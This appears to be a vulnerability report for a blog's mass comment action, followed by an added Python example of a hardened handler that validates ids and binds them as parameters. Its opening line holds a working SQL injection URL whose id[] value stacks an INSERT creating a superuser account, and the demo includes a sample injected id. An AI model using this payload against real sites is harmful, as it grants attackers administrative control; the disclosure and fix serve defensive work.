The comment ids aren't checked and are vulnerable to SQL injection:
https://127.0.0.1:8001/private/en/blog/mass_comment_action?token=q58o77xs9&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%[email protected]%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=spam
This vulnerability allows SQL injection through the `id[]` parameter.
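The root cause described above is that values from `id[]` reach the query without being checked. A hardened version of such a bulk-action handler, added here as an illustration and not taken from the affected application (the table and column names, the action whitelist and the sqlite3 backend are all assumptions), validates every id as a positive integer before the query is built and binds the ids as parameters of a generated `IN (?,?,...)` list, so a value like the one in the report is rejected before any SQL runs:

```python
import re
import sqlite3
from typing import Iterable, List

# Hypothetical schema standing in for the application's tables
# (constructed for this example; not the page's or the project's code).
SCHEMA = """
CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT, status TEXT);
CREATE TABLE users (email TEXT, password TEXT, is_god INTEGER);
INSERT INTO comments VALUES (1, 'first',  'published');
INSERT INTO comments VALUES (2, 'second', 'published');
INSERT INTO comments VALUES (3, 'third',  'published');
"""

# Assumed whitelist of bulk actions; the action string never reaches SQL
# as text, it is bound as a parameter after this check.
ALLOWED_ACTIONS = {"spam", "published", "moderation"}

# A comment id is a positive decimal integer of sane length; anything else
# (semicolons, quotes, comment markers, unicode digits) is rejected outright.
ID_PATTERN = re.compile(r"[1-9][0-9]{0,18}")


def validate_ids(raw_ids: Iterable[str], limit: int = 100) -> List[int]:
    """Coerce every id[] value to an int or raise ValueError.

    Refusing the whole request is preferable to silently dropping bad
    values: a non-numeric id is never a legitimate form submission.
    """
    ids: List[int] = []
    for raw in raw_ids:
        raw = str(raw).strip()
        if not ID_PATTERN.fullmatch(raw):
            raise ValueError(f"invalid comment id: {raw!r}")
        ids.append(int(raw))
    if not ids or len(ids) > limit:
        raise ValueError(f"id[] must contain between 1 and {limit} values")
    return ids


def mass_comment_action(conn: sqlite3.Connection, raw_ids: Iterable[str],
                        action: str) -> int:
    """Apply `action` to the given comments; returns the number of rows changed."""
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"unknown action: {action!r}")
    ids = validate_ids(raw_ids)
    # One placeholder per id: the ids are bound, never concatenated, so the
    # statement text is fixed regardless of what the client sent.
    placeholders = ",".join("?" * len(ids))
    sql = f"UPDATE comments SET status = ? WHERE id IN ({placeholders})"
    cur = conn.execute(sql, [action, *ids])
    conn.commit()
    return cur.rowcount


def build_demo_db() -> sqlite3.Connection:
    """In-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def comment_statuses(conn: sqlite3.Connection) -> List[str]:
    return [row[0] for row in conn.execute(
        "SELECT status FROM comments ORDER BY id")]


def user_count(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT count(*) FROM users").fetchone()[0]


if __name__ == "__main__":
    db = build_demo_db()
    print("legitimate request changed", mass_comment_action(db, ["1", "3"], "spam"), "rows")
    try:
        # Constructed hostile value: rejected by validate_ids before any SQL runs.
        mass_comment_action(db, ["3); SELECT 1; --"], "spam")
    except ValueError as exc:
        print("rejected:", exc)
    print("statuses:", comment_statuses(db), "users:", user_count(db))
```

The two controls are independent: the whitelist and integer check reject malformed input early with a clear error, and the parameterised `IN` list means that even if validation were later loosened the ids could only ever be compared as values, not executed as SQL.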